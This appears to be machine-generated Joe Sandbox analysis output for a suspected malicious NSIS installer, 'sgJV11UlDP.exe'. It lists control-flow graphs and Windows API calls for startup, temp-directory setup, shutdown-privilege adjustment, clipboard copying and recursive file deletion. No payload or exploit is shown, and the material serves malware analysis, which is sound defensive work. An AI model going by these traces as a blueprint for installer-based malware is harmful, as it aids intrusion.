4033->4036 4034->4017 4037 403d81 SendMessageA 4034->4037 4105 4040e2 4035->4105 4040 403c7a 4036->4040 4041 403c5d SendMessageA IsWindowEnabled 4036->4041 4037->4030 4038 40140b 2 API calls 4051 403db7 4038->4051 4039 404006 DestroyWindow EndDialog 4039->4031 4045 403c87 4040->4045 4048 403cce SendMessageA 4040->4048 4049 403c9a 4040->4049 4057 403c7f 4040->4057 4041->4030 4041->4040 4043->4030 4044 40600f 17 API calls 4044->4051 4045->4048 4045->4057 4047 40407b 18 API calls 4047->4051 4048->4035 4052 403ca2 4049->4052 4053 403cb7 4049->4053 4050 403cb5 4050->4035 4051->4030 4051->4038 4051->4039 4051->4044 4051->4047 4074 403f46 DestroyWindow 4051->4074 4086 40407b 4051->4086 4099 40140b 4052->4099 4054 40140b 2 API calls 4053->4054 4056 403cbe 4054->4056 4056->4035 4056->4057 4102 404054 4057->4102 4059 403e32 GetDlgItem 4060 403e47 4059->4060 4061 403e4f ShowWindow KiUserCallbackDispatcher 4059->4061 4060->4061 4089 40409d KiUserCallbackDispatcher 4061->4089 4063 403e79 EnableWindow 4068 403e8d 4063->4068 4064 403e92 GetSystemMenu EnableMenuItem SendMessageA 4065 403ec2 SendMessageA 4064->4065 4064->4068 4065->4068 4068->4064 4090 4040b0 SendMessageA 4068->4090 4091 403b88 4068->4091 4094 405fed lstrcpynA 4068->4094 4070 403ef1 lstrlenA 4071 40600f 17 API calls 4070->4071 4072 403f02 SetWindowTextA 4071->4072 4095 401389 4072->4095 4074->4031 4075 403f60 CreateDialogParamA 4074->4075 4075->4031 4076 403f93 4075->4076 4077 40407b 18 API calls 4076->4077 4078 403f9e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4077->4078 4079 401389 2 API calls 4078->4079 4080 403fe4 4079->4080 4080->4030 4081 403fec ShowWindow 4080->4081 4082 4040c7 SendMessageA 4081->4082 4082->4031 4084 4040d0 SendMessageA 4083->4084 4085 4040df 4083->4085 4084->4085 4085->4051 4087 40600f 17 API calls 4086->4087 4088 404086 SetDlgItemTextA 4087->4088 4088->4059 4089->4063 4090->4068 4092 40600f 17 API calls 4091->4092 4093 403b96 SetWindowTextA 4092->4093 4093->4068 4094->4070 4097 401390 4095->4097 4096 4013fe 4096->4051 4097->4096 4098 4013cb MulDiv SendMessageA 4097->4098 4098->4097 4100 401389 2 API calls 4099->4100 4101 401420 4100->4101 4101->4057 4103 404061 SendMessageA 4102->4103 4104 40405b 4102->4104 4103->4050 4104->4103 4106 4041a5 4105->4106 4107 4040fa GetWindowLongA 4105->4107 4106->4030 4107->4106 4108 40410f 4107->4108 4108->4106 4109 40413c GetSysColor 4108->4109 4110 40413f 4108->4110 4109->4110 4111 404145 SetTextColor 4110->4111 4112 40414f SetBkMode 4110->4112 4111->4112 4113 404167 GetSysColor 4112->4113 4114 40416d 4112->4114 4113->4114 4115 404174 SetBkColor 4114->4115 4116 40417e 4114->4116 4115->4116 4116->4106 4117 404191 DeleteObject 4116->4117 4118 404198 CreateBrushIndirect 4116->4118 4117->4118 4118->4106 5590 4023a7 5591 402b2c 17 API calls 5590->5591 5592 4023b8 5591->5592 5593 402b2c 17 API calls 5592->5593 5594 4023c1 5593->5594 5595 402b2c 17 API calls 5594->5595 5596 4023cb GetPrivateProfileStringA 5595->5596 5597 40292c 5598 402b0a 17 API calls 5597->5598 5599 402932 5598->5599 5600 402967 5599->5600 5601 402783 5599->5601 5603 402944 5599->5603 5600->5601 5602 40600f 17 API calls 5600->5602 5602->5601 5603->5601 5605 405f4b wsprintfA 5603->5605 5605->5601 4845 402631 4846 402b0a 17 API calls 4845->4846 4849 40263b 4846->4849 4847 4026a9 4848 405bfe ReadFile 4848->4849 4849->4847 4849->4848 4850 4026ab 4849->4850 4851 4026bb 4849->4851 4854 405f4b wsprintfA 4850->4854 4851->4847 4853 4026d1 SetFilePointer 4851->4853 4853->4847 4854->4847 5606 4041b1 lstrcpynA lstrlenA 5607 4022b2 5608 402b2c 17 API calls 5607->5608 5609 4022b8 5608->5609 5610 402b2c 17 API calls 5609->5610 5611 4022c1 5610->5611 5612 402b2c 17 API calls 5611->5612 5613 4022ca 5612->5613 5614 4062f0 2 API calls 5613->5614 5615 4022d3 5614->5615 5616 4022e4 lstrlenA lstrlenA 5615->5616 5620 4022d7 5615->5620 5618 405114 24 API calls 5616->5618 5617 405114 24 API calls 5621 4022df 5617->5621 5619 402320 SHFileOperationA 5618->5619 5619->5620 5619->5621 5620->5617 5620->5621 5622 402334 5623 40234e 5622->5623 5624 40233b 5622->5624 5625 40600f 17 API calls 5624->5625 5626 402348 5625->5626 5626->5623 5627 405709 MessageBoxIndirectA 5626->5627 5627->5623 5628 4014b7 5629 4014bd 5628->5629 5630 401389 2 API calls 5629->5630 5631 4014c5 5630->5631 5632 402138 5633 402b2c 17 API calls 5632->5633 5634 40213f 5633->5634 5635 402b2c 17 API calls 5634->5635 5636 402149 5635->5636 5637 402b2c 17 API calls 5636->5637 5638 402153 5637->5638 5639 402b2c 17 API calls 5638->5639 5640 40215d 5639->5640 5641 402b2c 17 API calls 5640->5641 5642 402167 5641->5642 5643 4021a9 CoCreateInstance 5642->5643 5644 402b2c 17 API calls 5642->5644 5647 4021c8 5643->5647 5649 402273 5643->5649 5644->5643 5645 401423 24 API calls 5646 4022a9 5645->5646 5648 402253 MultiByteToWideChar 5647->5648 5647->5649 5648->5649 5649->5645 5649->5646 4969 4015bb 4970 402b2c 17 API calls 4969->4970 4971 4015c2 4970->4971 4972 405a1e 4 API calls 4971->4972 4984 4015ca 4972->4984 4973 401624 4975 401652 4973->4975 4976 401629 4973->4976 4974 4059b0 CharNextA 4974->4984 4978 401423 24 API calls 4975->4978 4977 401423 24 API calls 4976->4977 4979 401630 4977->4979 4986 40164a 4978->4986 4988 405fed lstrcpynA 4979->4988 4981 405657 2 API calls 4981->4984 4982 405674 5 API calls 4982->4984 4983 40163b SetCurrentDirectoryA 4983->4986 4984->4973 4984->4974 4984->4981 4984->4982 4985 40160c GetFileAttributesA 4984->4985 4987 4055da 4 API calls 4984->4987 4985->4984 4987->4984 4988->4983 5650 4016bb 5651 402b2c 17 API calls 5650->5651 5652 4016c1 GetFullPathNameA 5651->5652 5653 4016d8 5652->5653 5659 4016f9 5652->5659 5656 4062f0 2 API calls 5653->5656 5653->5659 5654 4029b8 5655 40170d GetShortPathNameA 5655->5654 5657 4016e9 5656->5657 5657->5659 5660 405fed lstrcpynA 5657->5660 5659->5654 5659->5655 5660->5659 5661 40273b 5662 402741 5661->5662 5663 402745 FindNextFileA 5662->5663 5665 402757 5662->5665 5664 402796 5663->5664 5663->5665 5667 405fed lstrcpynA 5664->5667 5667->5665 5668 40243d 5669 402b2c 17 API calls 5668->5669 5670 40244f 5669->5670 5671 402b2c 17 API calls 5670->5671 5672 402459 5671->5672 5685 402bbc 5672->5685 5675 4029b8 5676 40248e 5678 40249a 5676->5678 5679 402b0a 17 API calls 5676->5679 5677 402b2c 17 API calls 5681 402487 lstrlenA 5677->5681 5680 4024b9 RegSetValueExA 5678->5680 5682 402ffb 31 API calls 5678->5682 5679->5678 5683 4024cf RegCloseKey 5680->5683 5681->5676 5682->5680 5683->5675 5686 402bd7 5685->5686 5689 405ea1 5686->5689 5690 405eb0 5689->5690 5691 402469 5690->5691 5692 405ebb RegCreateKeyExA 5690->5692 5691->5675 5691->5676 5691->5677 5692->5691 5693 401b3f 5694 402b2c 17 API calls 5693->5694 5695 401b46 5694->5695 5696 402b0a 17 API calls 5695->5696 5697 401b4f wsprintfA 5696->5697 5698 4029b8 5697->5698

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 403248-403287 SetErrorMode GetVersion 1 403289-403291 call 406385 0->1 2 40329a 0->2 1->2 8 403293 1->8 4 40329f-4032b2 call 406317 lstrlenA 2->4 9 4032b4-4032d0 call 406385 * 3 4->9 8->2 16 4032e1-40333f #17 OleInitialize SHGetFileInfoA call 405fed GetCommandLineA call 405fed 9->16 17 4032d2-4032d8 9->17 24 403341-403346 16->24 25 40334b-403360 call 4059b0 CharNextA 16->25 17->16 21 4032da 17->21 21->16 24->25 28 403425-403429 25->28 29 403365-403368 28->29 30 40342f 28->30 31 403370-403378 29->31 32 40336a-40336e 29->32 33 403442-40345c GetTempPathA call 403217 30->33 34 403380-403383 31->34 35 40337a-40337b 31->35 32->31 32->32 43 4034b4-4034ce DeleteFileA call 402dc4 33->43 44 40345e-40347c GetWindowsDirectoryA lstrcatA call 403217 33->44 37 403415-403422 call 4059b0 34->37 38 403389-40338d 34->38 35->34 37->28 56 403424 37->56 41 4033a5-4033d2 38->41 42 40338f-403395 38->42 49 4033d4-4033da 41->49 50 4033e5-403413 41->50 47 403397-403399 42->47 48 40339b 42->48 59 403562-403572 call 403730 OleUninitialize 43->59 60 4034d4-4034da 43->60 44->43 58 40347e-4034ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403217 44->58 47->41 47->48 48->41 52 4033e0 49->52 53 4033dc-4033de 49->53 50->37 55 403431-40343d call 405fed 50->55 52->50 53->50 53->52 55->33 56->28 58->43 58->59 72 403696-40369c 59->72 73 403578-403588 call 405709 ExitProcess 59->73 63 403552-403559 call 40380a 60->63 64 4034dc-4034e7 call 4059b0 60->64 70 40355e 63->70 76 4034e9-403512 64->76 77 40351d-403527 64->77 70->59 74 403718-403720 72->74 75 40369e-4036b7 GetCurrentProcess OpenProcessToken 72->75 82 403722 74->82 83 403726-40372a ExitProcess 74->83 79 4036e9-4036f7 call 406385 75->79 80 4036b9-4036e3 LookupPrivilegeValueA AdjustTokenPrivileges 75->80 81 403514-403516 76->81 84 403529-403536 call 405a73 77->84 85 40358e-4035a2 call 405674 lstrcatA 77->85 97 403705-40370f ExitWindowsEx 79->97 98 4036f9-403703 79->98 80->79 81->77 90 403518-40351b 81->90 82->83 84->59 94 403538-40354e call 405fed * 2 84->94 95 4035a4-4035aa lstrcatA 85->95 96 4035af-4035c9 lstrcatA lstrcmpiA 85->96 90->77 90->81 94->63 95->96 96->59 100 4035cb-4035ce 96->100 97->74 101 403711-403713 call 40140b 97->101 98->97 98->101 103 4035d0-4035d5 call 4055da 100->103 104 4035d7 call 405657 100->104 101->74 112 4035dc-4035e9 SetCurrentDirectoryA 103->112 104->112 113 4035f6-40361e call 405fed 112->113 114 4035eb-4035f1 call 405fed 112->114 118 403624-403640 call 40600f DeleteFileA 113->118 114->113 121 403681-403688 118->121 122 403642-403652 CopyFileA 118->122 121->118 124 40368a-403691 call 405dcc 121->124 122->121 123 403654-403674 call 405dcc call 40600f call 40568c 122->123 123->121 133 403676-40367d CloseHandle 123->133 124->59 133->121
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 0040326D
                                                                      • GetVersion.KERNEL32 ref: 00403273
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6
                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032E2
                                                                      • OleInitialize.OLE32(00000000), ref: 004032E9
                                                                      • SHGetFileInfoA.SHELL32(0079E508,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403305
                                                                      • GetCommandLineA.KERNEL32(Desalinates Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040331A
                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\sgJV11UlDP.exe",00000020,"C:\Users\user\Desktop\sgJV11UlDP.exe",00000000,?,00000006,00000008,0000000A), ref: 00403356
                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403464
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403470
                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403484
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348C
                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040349D
                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004034A5
                                                                      • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034B9
                                                                        • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                        • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                        • Part of subcall function 0040380A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\unscorified,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,75573410), ref: 004038FA
                                                                        • Part of subcall function 0040380A: lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
                                                                        • Part of subcall function 0040380A: GetFileAttributesA.KERNEL32(Call), ref: 00403918
                                                                        • Part of subcall function 0040380A: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\unscorified), ref: 00403961
                                                                        • Part of subcall function 0040380A: RegisterClassA.USER32(007A26E0), ref: 0040399E
                                                                        • Part of subcall function 00403730: CloseHandle.KERNEL32(000002EC,00403567,?,?,00000006,00000008,0000000A), ref: 0040373B
                                                                      • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403567
                                                                      • ExitProcess.KERNEL32 ref: 00403588
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 004036A5
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036C4
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036E3
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
                                                                      • ExitProcess.KERNEL32 ref: 0040372A
                                                                        • Part of subcall function 00405709: MessageBoxIndirectA.USER32(0040A218), ref: 00405764
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                      • String ID: "$"C:\Users\user\Desktop\sgJV11UlDP.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\unscorified$C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens$C:\Users\user\Desktop$C:\Users\user\Desktop\sgJV11UlDP.exe$Desalinates Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KXu$~nsu
                                                                      • API String ID: 3776617018-296842004
                                                                      • Opcode ID: 838075baaf5ca056da215ee939d52fd3958900b4641c77022dcb02f612f56dab
                                                                      • Instruction ID: 4b1384cee9ffc8e7d3909f75f513e580ba658b4e0f6039b9d7a5280b54d142a8
                                                                      • Opcode Fuzzy Hash: 838075baaf5ca056da215ee939d52fd3958900b4641c77022dcb02f612f56dab
                                                                      • Instruction Fuzzy Hash: B3C1E870104741AAD7216F759D89A2F3FA8AB86306F05453FF581B61E2CB7C8A15CB2E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 134 405252-40526e 135 405274-40533b GetDlgItem * 3 call 4040b0 call 4049a1 GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 4053fd-405403 134->136 159 405359-40535c 135->159 160 40533d-405357 SendMessageA * 2 135->160 138 405405-405427 GetDlgItem CreateThread CloseHandle 136->138 139 40542d-405439 136->139 138->139 141 40545b-405461 139->141 142 40543b-405441 139->142 145 405463-405469 141->145 146 4054b6-4054b9 141->146 143 405443-405456 ShowWindow * 2 call 4040b0 142->143 144 40547c-405483 call 4040e2 142->144 143->141 156 405488-40548c 144->156 149 40546b-405477 call 404054 145->149 150 40548f-40549f ShowWindow 145->150 146->144 153 4054bb-4054c1 146->153 149->144 157 4054a1-4054aa call 405114 150->157 158 4054af-4054b1 call 404054 150->158 153->144 154 4054c3-4054d6 SendMessageA 153->154 161 4055d3-4055d5 154->161 162 4054dc-405508 CreatePopupMenu call 40600f AppendMenuA 154->162 157->158 158->146 163 40536c-405383 call 40407b 159->163 164 40535e-40536a SendMessageA 159->164 160->159 161->156 171 40550a-40551a GetWindowRect 162->171 172 40551d-405533 TrackPopupMenu 162->172 173 405385-405399 ShowWindow 163->173 174 4053b9-4053da GetDlgItem SendMessageA 163->174 164->163 171->172 172->161 175 405539-405553 172->175 176 4053a8 173->176 177 40539b-4053a6 ShowWindow 173->177 174->161 178 4053e0-4053f8 SendMessageA * 2 174->178 179 405558-405573 SendMessageA 175->179 180 4053ae-4053b4 call 4040b0 176->180 177->180 178->161 179->179 181 405575-405595 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 405597-4055b7 SendMessageA 181->183 183->183 184 4055b9-4055cd GlobalUnlock SetClipboardData CloseClipboard 183->184 184->161
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 004052B1
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004052C0
                                                                      • GetClientRect.USER32(?,?), ref: 004052FD
                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405304
                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405325
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405336
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405349
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405357
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040536A
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040538C
                                                                      • ShowWindow.USER32(?,00000008), ref: 004053A0
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004053C1
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053D1
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053EA
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F6
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004052CF
                                                                        • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405412
                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000051E6,00000000), ref: 00405420
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405427
                                                                      • ShowWindow.USER32(00000000), ref: 0040544A
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405451
                                                                      • ShowWindow.USER32(00000008), ref: 00405497
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054CB
                                                                      • CreatePopupMenu.USER32 ref: 004054DC
                                                                      • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054F1
                                                                      • GetWindowRect.USER32(?,000000FF), ref: 00405511
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040552A
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405566
                                                                      • OpenClipboard.USER32(00000000), ref: 00405576
                                                                      • EmptyClipboard.USER32 ref: 0040557C
                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405585
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040558F
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004055A3
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004055BC
                                                                      • SetClipboardData.USER32(?,00000000), ref: 004055C7
                                                                      • CloseClipboard.USER32 ref: 004055CD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID:
                                                                      • API String ID: 590372296-0
                                                                      • Opcode ID: fe83000176ef68774a1613465f0c1fa99a691d0f6c525a9b60e7a3ca6ad1dfb2
                                                                      • Instruction ID: e249d6b51738ec221da1a53d9ec42c2df55930041f70e6241115b0d1b6ef0d10
                                                                      • Opcode Fuzzy Hash: fe83000176ef68774a1613465f0c1fa99a691d0f6c525a9b60e7a3ca6ad1dfb2
                                                                      • Instruction Fuzzy Hash: D0A15AB1900608BFDF119F64DD85EAF7BB9FB48344F10802AFA41B61A1CB794E519F68

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 493 4057b5-4057db call 405a73 496 4057f4-4057fb 493->496 497 4057dd-4057ef DeleteFileA 493->497 499 4057fd-4057ff 496->499 500 40580e-40581e call 405fed 496->500 498 40597e-405982 497->498 501 405805-405808 499->501 502 40592c-405931 499->502 508 405820-40582b lstrcatA 500->508 509 40582d-40582e call 4059cc 500->509 501->500 501->502 502->498 504 405933-405936 502->504 506 405940-405948 call 4062f0 504->506 507 405938-40593e 504->507 506->498 517 40594a-40595e call 405985 call 40576d 506->517 507->498 511 405833-405836 508->511 509->511 514 405841-405847 lstrcatA 511->514 515 405838-40583f 511->515 516 40584c-40586a lstrlenA FindFirstFileA 514->516 515->514 515->516 518 405870-405887 call 4059b0 516->518 519 405922-405926 516->519 532 405960-405963 517->532 533 405976-405979 call 405114 517->533 526 405892-405895 518->526 527 405889-40588d 518->527 519->502 521 405928 519->521 521->502 530 405897-40589c 526->530 531 4058a8-4058b6 call 405fed 526->531 527->526 529 40588f 527->529 529->526 535 405901-405913 FindNextFileA 530->535 536 40589e-4058a0 530->536 544 4058b8-4058c0 531->544 545 4058cd-4058d8 call 40576d 531->545 532->507 538 405965-405974 call 405114 call 405dcc 532->538 533->498 535->518 541 405919-40591c FindClose 535->541 536->531 539 4058a2-4058a6 536->539 538->498 539->531 539->535 541->519 544->535 548 4058c2-4058cb call 4057b5 544->548 553 4058f9-4058fc call 405114 545->553 554 4058da-4058dd 545->554 548->535 553->535 555 4058f1-4058f7 554->555 556 4058df-4058ef call 405114 call 405dcc 554->556 555->535 556->535
                                                                      APIs
                                                                      • DeleteFileA.KERNELBASE(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057DE
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso1F91.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405826
                                                                      • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405847
                                                                      • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584D
                                                                      • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nso1F91.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nso1F91.tmp,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040585E
                                                                      • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040590B
                                                                      • FindClose.KERNELBASE(00000000), ref: 0040591C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\sgJV11UlDP.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nso1F91.tmp$\*.*
                                                                      • API String ID: 2035342205-1059558934
                                                                      • Opcode ID: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
                                                                      • Instruction ID: eea8dcc9899e8fe382e67b4d85d328ba4a3fbbae0ab86688a1659871ceec6938
                                                                      • Opcode Fuzzy Hash: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
                                                                      • Instruction Fuzzy Hash: 4051E171800A08FADF226B618C45FAF7A78DF42728F14807BF841B51D2D73C4992DE69
                                                                      APIs
